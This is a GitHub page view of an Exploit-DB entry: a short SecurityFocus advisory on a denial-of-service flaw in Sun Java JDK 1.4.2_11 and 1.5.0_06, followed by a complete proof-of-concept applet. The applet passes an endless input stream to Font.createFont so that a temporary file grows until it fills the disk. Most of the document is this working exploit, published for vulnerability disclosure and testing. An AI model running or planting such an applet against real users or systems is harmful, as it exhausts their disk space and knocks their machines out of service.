forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path27882.java
More file actions
executable file
·48 lines (36 loc) · 1.1 KB
/
27882.java
File metadata and controls
executable file
·48 lines (36 loc) · 1.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
source: http://www.securityfocus.com/bid/17981/info
Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets.
Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.
Sun Java JDK 1.4.2_11 and 1.5.0_06 are vulnerable; other versions may also be affected.
import java.applet.Applet;
import java.awt.Font;
import java.io.InputStream;
class MIS extends InputStream
{
MIS()
{
}
public int read()
{
return 0;
}
public int read(byte abyte0[], int i, int j)
{
return j - i;
}
}
public class FontCreatorFullDiskApplet extends Applet
{
public FontCreatorFullDiskApplet()
{
}
static
{
try
{
byte abyte0[] = new byte[0];
Font font = Font.createFont(0, new MIS());
}
catch(Exception exception) { }
}
}